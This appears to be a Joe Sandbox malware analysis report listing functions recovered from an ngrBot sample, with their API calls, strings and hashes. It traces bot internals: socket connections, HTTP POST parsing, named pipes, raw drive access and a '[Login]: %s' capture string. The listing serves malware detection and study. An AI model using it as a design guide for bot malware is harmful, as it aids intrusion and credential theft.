                                                                  • Instruction ID: 811a997c4f99f12f1588b30ab6376034f2db93121b1abe16afbb04e2c56fb9c5
                                                                  • Opcode Fuzzy Hash: 726638a4f028c6ba6f7936c4ead4811d6733c4fe72510fbdea1a5c505a67353c
                                                                  • Instruction Fuzzy Hash: 8321F6736042256BDB229E69BCC9FEBB75CEB45750F04066AFD09D7281FA70DE0086E1
                                                                  Function 003D8670 Relevance: 12.1, APIs: 8, Instructions: 70networkmemorythreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103C), ref: 003D8688
                                                                  • htons.WS2_32(?), ref: 003D86AE
                                                                  • inet_ntoa.WS2_32(?), ref: 003D86F7
                                                                  • htons.WS2_32(?), ref: 003D8704
                                                                  • GetTickCount.KERNEL32 ref: 003D8713
                                                                  • CreateThread.KERNEL32(00000000,00000000,003D8640,00000000,00000000,00000000), ref: 003D8734
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D873B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: htons$AllocCloseCountCreateHandleLocalThreadTickinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 30336511-0
                                                                  • Opcode ID: af12c214352e10b6538f221c1e0159bf503b42256e46f0ec42b0049817f4e98a
                                                                  • Instruction ID: 51ce0e87f36cb32933fdc6b0470ac3a89e3a90fa5e488efc42ef44af56d270e5
                                                                  • Opcode Fuzzy Hash: af12c214352e10b6538f221c1e0159bf503b42256e46f0ec42b0049817f4e98a
                                                                  • Instruction Fuzzy Hash: 3F212B7560174097D3225BB4FC4A7EA77A8AF04310F144A2AF59D8B3D0DBF0A5848B59
                                                                  Function 003D7790 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 69stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D77AE
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,00000103), ref: 003D77C8
                                                                  • lstrcpyA.KERNEL32(00000000,off), ref: 003D77F0
                                                                  • _snprintf.MSVCRT(00000000,000001FF,state_%s,?), ref: 003D780D
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D7822
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D7858
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemset$_snprintflstrcpy
                                                                  • String ID: off$state_%s
                                                                  • API String ID: 1009457118-628336787
                                                                  • Opcode ID: c58a2284145792037302e4825a14ceb9efdd0f4ac73b6e8fab3f2b352600a043
                                                                  • Instruction ID: 92e4799965af19d95a97f8d053ad596c3340455020d04244051422044a56e440
                                                                  • Opcode Fuzzy Hash: c58a2284145792037302e4825a14ceb9efdd0f4ac73b6e8fab3f2b352600a043
                                                                  • Instruction Fuzzy Hash: F91133B694136877D722E651DC46FEF337C8B84700F0002E9FB486A1C2E6F02B848AA1
                                                                  Function 003D3440 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • printf.MSVCRT(block_size: %d,?,00407A80,?), ref: 003D34A0
                                                                  • printf.MSVCRT(ngr->blocksize: %d,?,block_size: %d,?,00407A80,?), ref: 003D34AD
                                                                  • printf.MSVCRT(Done frst,?,?,?,?,00407A80,?), ref: 003D34CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: printf
                                                                  • String ID: Done frst$block_size: %d$ngr->blocksize: %d
                                                                  • API String ID: 3524737521-1816125109
                                                                  • Opcode ID: 409b0083087d7c189a890ef92a4eb55af9b5fa2f7869c1f4943bc78cbec9bc57
                                                                  • Instruction ID: d8348b0a48bcf4153e2e422b9b27adce15ae64e4305fe7c675b2ff77673fc277
                                                                  • Opcode Fuzzy Hash: 409b0083087d7c189a890ef92a4eb55af9b5fa2f7869c1f4943bc78cbec9bc57
                                                                  • Instruction Fuzzy Hash: 8641E7B6A00204ABCB15DF69E845E9A77A9EF84314F14C65EF8098B381E731EF01CB91
                                                                  Function 003D2A30 Relevance: 10.6, APIs: 7, Instructions: 131networksleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • htons.WS2_32(?), ref: 003D2A44
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003D2A8A
                                                                  • WSAGetLastError.WS2_32(00000002,00000001,00000006), ref: 003D2A96
                                                                  • GetLastError.KERNEL32(00000002,00000001,00000006), ref: 003D2A9B
                                                                    • Part of subcall function 003D24A0: GetProcessHeap.KERNEL32(00000000,?,003D2131,00000000), ref: 003D24B4
                                                                    • Part of subcall function 003D24A0: HeapFree.KERNEL32(?,00000000,1!=,00000000,?,003D2131,00000000), ref: 003D24C3
                                                                  • inet_ntoa.WS2_32(00000002), ref: 003D2AEE
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 003D2AFC
                                                                  • Sleep.KERNEL32(000005DC,00000000,?,00000010,00000001,00000006), ref: 003D2B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocFreeSleepconnecthtonsinet_ntoasocket
                                                                  • String ID:
                                                                  • API String ID: 268164981-0
                                                                  • Opcode ID: 9bde5acb8af36243b5af01ecac1e01bb78957b5b1a7064ca6c6f413058b22165
                                                                  • Instruction ID: 9847c3193035cafeb3b631aa02bcd00f8281856ed319ef1cca363af67ee65841
                                                                  • Opcode Fuzzy Hash: 9bde5acb8af36243b5af01ecac1e01bb78957b5b1a7064ca6c6f413058b22165
                                                                  • Instruction Fuzzy Hash: CC411772E002149BCB22EFA9E881A6FB3B9FF54324F104667E959DF380D6719941CBC1
                                                                  Function 003D7F90 Relevance: 10.6, APIs: 7, Instructions: 131networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 003D7FD4
                                                                  • send.WS2_32(?,?,?,00000000), ref: 003D7FFB
                                                                  • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00000000,?), ref: 003D8004
                                                                  • select.WS2_32(00000000,00000000,00000000,00000001,?), ref: 003D803D
                                                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 003D8081
                                                                  • recv.WS2_32(?,?,00001000,00000000), ref: 003D809A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: select$FreeLocalrecvsend
                                                                  • String ID:
                                                                  • API String ID: 1822081929-0
                                                                  • Opcode ID: 346268592867af884d1ec6f78dc87a983da32c04590c78595c975192d30af863
                                                                  • Instruction ID: 5d52aa98b90b997aba3639d25935eea7cd0c69996008af9f1129a567a708c8c4
                                                                  • Opcode Fuzzy Hash: 346268592867af884d1ec6f78dc87a983da32c04590c78595c975192d30af863
                                                                  • Instruction Fuzzy Hash: F2418172500754ABD730DB69DC81BE6B3F8EB98710F00469EF5898B680D7F5B9C98B90
                                                                  Function 003D6E20 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 126memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 003DAFBD
                                                                    • Part of subcall function 003DAFA0: HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 003DAFCB
                                                                    • Part of subcall function 003DAFA0: memset.MSVCRT(?,00000000,000003FF), ref: 003DAFE8
                                                                    • Part of subcall function 003DAFA0: memset.MSVCRT(?,00000000,000003FF,?,00000000,000003FF), ref: 003DB002
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(?), ref: 003DB013
                                                                    • Part of subcall function 003DAFA0: sscanf.MSVCRT(00000000,POST /%1023s,00000000,00000000,?,00000000), ref: 003DB02A
                                                                    • Part of subcall function 003DAFA0: strtok.MSVCRT(00000000,003E2B84), ref: 003DB041
                                                                    • Part of subcall function 003DAFA0: _memicmp.MSVCRT(00000000,Host: ,00000006), ref: 003DB05B
                                                                    • Part of subcall function 003DAFA0: strtok.MSVCRT(00000000,003E2B84), ref: 003DB06E
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB09B
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB0AD
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB0BB
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB0C6
                                                                    • Part of subcall function 003DAFA0: HeapAlloc.KERNEL32(?,00000000,?), ref: 003DB0D5
                                                                    • Part of subcall function 003DAFA0: _memicmp.MSVCRT(00000000,HTTP,00000004), ref: 003DB0EB
                                                                  • strstr.MSVCRT(00000000,003E19DC,?,?,?,?), ref: 003D6EBC
                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 003D6EC9
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 003D6EE7
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 003D6F1A
                                                                  • HeapFree.KERNEL32(?,00000000,?,?,?), ref: 003D6F2C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 003D6F3C
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(003D6E9C,00000000,00000000,00000000,?,?,003D6E9C), ref: 003DB178
                                                                    • Part of subcall function 003DB160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,003D6E9C), ref: 003DB186
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(003D6E9C,?,?,003D6E9C), ref: 003DB18F
                                                                    • Part of subcall function 003DB160: strstr.MSVCRT(00000000,,00000000,003D6E9C,00000000,?,?,003D6E9C), ref: 003DB19F
                                                                    • Part of subcall function 003DB160: strstr.MSVCRT(-00000004,003E19DC,?,?,?,003D6E9C), ref: 003DB1B6
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1C3
                                                                    • Part of subcall function 003DB160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,003D6E9C), ref: 003DB1D2
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1DC
                                                                    • Part of subcall function 003DB160: lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,003D6E9C), ref: 003DB1E5
                                                                    • Part of subcall function 003DB160: HeapFree.KERNEL32(?,00000000,00000000,?,?,?,003D6E9C), ref: 003DB1F8
                                                                    • Part of subcall function 003E01E0: memset.MSVCRT(?,00000000,000001FF,00000000,00000000,00000000), ref: 003E0202
                                                                    • Part of subcall function 003E01E0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 003E0213
                                                                    • Part of subcall function 003E01E0: EnterCriticalSection.KERNEL32(0041B4E4), ref: 003E0223
                                                                    • Part of subcall function 003E01E0: strstr.MSVCRT(00000000,003E19DC), ref: 003E0243
                                                                    • Part of subcall function 003E01E0: lstrlenA.KERNEL32(00000000), ref: 003E0254
                                                                    • Part of subcall function 003E01E0: HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E025F
                                                                    • Part of subcall function 003E01E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 003E0272
                                                                    • Part of subcall function 003E01E0: strstr.MSVCRT(00000000,), ref: 003E0281
                                                                    • Part of subcall function 003E01E0: _snprintf.MSVCRT(00000000,000001FF,%s=,003E32E4), ref: 003E02C8
                                                                    • Part of subcall function 003E01E0: strstr.MSVCRT(?,00000000), ref: 003E02EF
                                                                    • Part of subcall function 003E01E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$Allocstrstr$Free$memset$Process_memicmpstrtok$CriticalEnterSection_snprintflstrcpylstrcpynsscanf
                                                                  • String ID: POST
                                                                  • API String ID: 836748388-1814004025
                                                                  • Opcode ID: 6cffed90115b803e4864d878469acf2efbdf8d554fd39e4f5d92a4e99fb107d7
                                                                  • Instruction ID: 63f0ae21f64fb225f9e41665d6670f6d936ba1d1c2a59830f0aebc9861772fe6
                                                                  • Opcode Fuzzy Hash: 6cffed90115b803e4864d878469acf2efbdf8d554fd39e4f5d92a4e99fb107d7
                                                                  • Instruction Fuzzy Hash: AC31B576900204ABCB129FA5FC86EAF77BCEB84300F15417AF91897341DA75EE1487A2
                                                                  Function 003DD110 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003DD131
                                                                  • lstrcmpA.KERNEL32(?,332), ref: 003DD145
                                                                  • strchr.MSVCRT(?,00000021), ref: 003DD162
                                                                  • lstrcpynA.KERNEL32(00000000,?,000001FF), ref: 003DD18C
                                                                  • lstrlenA.KERNEL32 ref: 003DD198
                                                                  • memmove.MSVCRT(?,?,00000000), ref: 003DD1A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpynlstrlenmemmovememsetstrchr
                                                                  • String ID: 332
                                                                  • API String ID: 3300951897-3855660651
                                                                  • Opcode ID: cb318ee29ff4b70d50a5aa88a21328819fa69738829e59d43219a2b379f4f85a
                                                                  • Instruction ID: 0ac594734c089ca957fd53fd1aaf3adec000987230e20a77b367f42a0daac096
                                                                  • Opcode Fuzzy Hash: cb318ee29ff4b70d50a5aa88a21328819fa69738829e59d43219a2b379f4f85a
                                                                  • Instruction Fuzzy Hash: 7E310876900256BBEB219B68DCC9FA7776CEF44340F044269F9099B282E770ED15C7B0
                                                                  Function 003D7610 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 87stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,?), ref: 003D7640
                                                                  • _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D765C
                                                                  • _vsnprintf.MSVCRT(?,000001FF,00000000,003D1732,?), ref: 003D767E
                                                                  • lstrcmpA.KERNEL32(?,bdns,?,?), ref: 003D76A0
                                                                  • StrStrIA.SHLWAPI(?,00000000,?,?), ref: 003D76B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf_vsnprintflstrcmplstrlen
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 4220314296-741241040
                                                                  • Opcode ID: f403f46c3705a04ed65c703e21a46cff4629d911d7a149d87503122b124a3851
                                                                  • Instruction ID: 77670595b60e41066d344227f095d3daffdf373f939193edde8efd5469b55512
                                                                  • Opcode Fuzzy Hash: f403f46c3705a04ed65c703e21a46cff4629d911d7a149d87503122b124a3851
                                                                  • Instruction Fuzzy Hash: 9E21C477A006586BDB319E69FCC4FEB736CEB44714F04066AF918DB241F670D91086E0
                                                                  Function 003D3B90 Relevance: 10.6, APIs: 7, Instructions: 82pipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 003D3BD8
                                                                  • CreateNamedPipeA.KERNEL32(?,40000001,00000000,000000FF,00010000,00010000,00000000,00000000), ref: 003D3C0F
                                                                  • ConnectNamedPipe.KERNEL32(00000000,?), ref: 003D3C25
                                                                  • GetLastError.KERNEL32 ref: 003D3C2F
                                                                  • GetLastError.KERNEL32 ref: 003D3C46
                                                                  • SetEvent.KERNEL32(00000000), ref: 003D3C56
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorEventLastNamedPipe$Connect
                                                                  • String ID:
                                                                  • API String ID: 3507186782-0
                                                                  • Opcode ID: 6508a918885a5a1c871ca5e0909e927984ca0dbaa22b324577ef92e9f5154cb0
                                                                  • Instruction ID: 6e18c24d0fd934b48f95fba5beefbd480f2d4ce9115c69f31724737efa034221
                                                                  • Opcode Fuzzy Hash: 6508a918885a5a1c871ca5e0909e927984ca0dbaa22b324577ef92e9f5154cb0
                                                                  • Instruction Fuzzy Hash: E321C576350206AFE7228F64ECC4B99BB68EF44751F204626FA59DB2C0D7B1ED808B50
                                                                  Function 003DF2B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D3810: GetProcessHeap.KERNEL32(00000000,00000000,?,003D4046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 003D3819
                                                                    • Part of subcall function 003D3810: HeapAlloc.KERNEL32(00000000,?,003D4046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 003D3820
                                                                  • sprintf.MSVCRT(00000000,\\.\%c:), ref: 003DF2E9
                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000003,00000000,00000003,00000000,00000000), ref: 003DF2FA
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DF323
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,003E09A7,0000000C,?,00000400,00000000,00000000), ref: 003DF352
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DF35B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCloseControlCreateDeviceFileHandleProcessmemsetsprintf
                                                                  • String ID: \\.\%c:
                                                                  • API String ID: 2995886503-1260769427
                                                                  • Opcode ID: 45330dfae05660c70b44339eec312ffb87198c0e831c5ee0537d35dd81d0d19e
                                                                  • Instruction ID: 12bad932ad225f58d662ae242f4f849a7494a98e8943895a97e5f2289af1f0b0
                                                                  • Opcode Fuzzy Hash: 45330dfae05660c70b44339eec312ffb87198c0e831c5ee0537d35dd81d0d19e
                                                                  • Instruction Fuzzy Hash: 752195F29002587FEB11DF95ACC5EFEB77CEB45754F00457AF608A6281E6B00F8546A1
                                                                  Function 003DA64A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 18synchronizationthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,003DE750,00000000,00000000,00000000), ref: 003DA659
                                                                  • MessageBoxA.USER32(00000000,This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!,ngrBot Error,00000030), ref: 003DA66F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003DA678
                                                                  • ExitProcess.KERNEL32 ref: 003DA680
                                                                  Strings
                                                                  • This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!, xrefs: 003DA666
                                                                  • ngrBot Error, xrefs: 003DA661
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateExitMessageObjectProcessSingleThreadWait
                                                                  • String ID: This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!$ngrBot Error
                                                                  • API String ID: 2697768853-1169653777
                                                                  • Opcode ID: a5cfc0bbb6f9ce1eaf14213e99751a1bb55a2b6bf98c8d6038dfa9f9c15b2d06
                                                                  • Instruction ID: 74839152eb196b6e4e4579e3b5b3df73638691be99580797c4b794a79f497b70
                                                                  • Opcode Fuzzy Hash: a5cfc0bbb6f9ce1eaf14213e99751a1bb55a2b6bf98c8d6038dfa9f9c15b2d06
                                                                  • Instruction Fuzzy Hash: 84E067357C43E1B6E67257A05D4BF8539185B04F12F250710F325BD1D08AF025804759
                                                                  Function 003D7330 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 60stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                  • lstrlenA.KERNEL32(?), ref: 003D7369
                                                                  • _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                  • _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintfmemset
                                                                  • String ID: %s_
                                                                  • API String ID: 3230270962-1040268105
                                                                  • Opcode ID: 536da33ee251caa1826b6da7d3ea45735cfc11ddaf55f6fde9000fac5c912f52
                                                                  • Instruction ID: bcf87c851dca9b873a90497d5bb07176677da3f1d14b393eeb859a4476ba7e0a
                                                                  • Opcode Fuzzy Hash: 536da33ee251caa1826b6da7d3ea45735cfc11ddaf55f6fde9000fac5c912f52
                                                                  • Instruction Fuzzy Hash: 70110C7694031977E720E6699C86FF7736CDB84740F0406B8B918672C2E5B09E4087E0
                                                                  Function 003E02A9 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 57memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT(00000000,000001FF,%s=,003E32E4), ref: 003E02C8
                                                                  • strstr.MSVCRT(?,00000000), ref: 003E02EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 003E0322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03EE
                                                                  • LeaveCriticalSection.KERNEL32(0041B4E4), ref: 003E03FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E041F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$CriticalLeaveSection_snprintfatoilstrlenstrstr
                                                                  • String ID: %s=
                                                                  • API String ID: 1805118874-2646424381
                                                                  • Opcode ID: 9782b6aea3b394cab68a1d687117295e2e44150c3da30f32962116118352e35b
                                                                  • Instruction ID: 055f7cd5b5166471076e06e7c7c0e2d4b4ace3ae238faa3cd6f5cf41c6ba3458
                                                                  • Opcode Fuzzy Hash: 9782b6aea3b394cab68a1d687117295e2e44150c3da30f32962116118352e35b
                                                                  • Instruction Fuzzy Hash: 6D11EC75A40269ABDB268792CC81BBE7378EB94300F144769FA15671C0D7B4BD818F91
                                                                  Function 003DDD20 Relevance: 9.0, APIs: 6, Instructions: 36sleepthreadnetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CleanupCountCriticalExitInitializeSectionSleepThreadTick
                                                                  • String ID:
                                                                  • API String ID: 544336047-0
                                                                  • Opcode ID: fa3f915c36e92becb304a62d8f08836efe5da1dd8732c3a6bba5796dbd4117b6
                                                                  • Instruction ID: 5e50ba2961e2f3403e61d8d2176927a908d51661619bd1c5c7e6cf318101a3ae
                                                                  • Opcode Fuzzy Hash: fa3f915c36e92becb304a62d8f08836efe5da1dd8732c3a6bba5796dbd4117b6
                                                                  • Instruction Fuzzy Hash: 63F0B4735416949ACE333BF87D8A56E321A5F12374F210713F615CA7F1EB3499808AA2
                                                                  Function 003D4560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s_%d,EDB88F28,?,00010000,EDB88320,00000000), ref: 003D45D5
                                                                  • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,003D4BA5,?,?,?,00010000,EDB88320,00000000), ref: 003D45FD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000,?,?,00010000,EDB88320,00000000), ref: 003D4636
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$CreateMappingView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 1261873476-1933919280
                                                                  • Opcode ID: 6bff0d8f59c82696245ff2424a048725beccbf7a1a8537736c6ea151bcfb1668
                                                                  • Instruction ID: 3589735130facbc3d8842c1e94acd1d69d8fc8487589de2d3374ef0f1c9b270d
                                                                  • Opcode Fuzzy Hash: 6bff0d8f59c82696245ff2424a048725beccbf7a1a8537736c6ea151bcfb1668
                                                                  • Instruction Fuzzy Hash: 4561E3726006428BD726CF18D8C5BB5B7E5FF84304F18827DE6868B3C5D779A9A0DB80
                                                                  Function 003DE4B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79sleepmemorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(?,?,0000002C), ref: 003DA013
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(00000000,?), ref: 003DA04F
                                                                  • lstrlenA.KERNEL32(?), ref: 003DE517
                                                                  • _memicmp.MSVCRT(?,?,00000000), ref: 003DE525
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DE54E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE57A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: strtok$FreeHeapSleep_memicmplstrlen
                                                                  • String ID: [Login]: %s
                                                                  • API String ID: 2470415281-2266835287
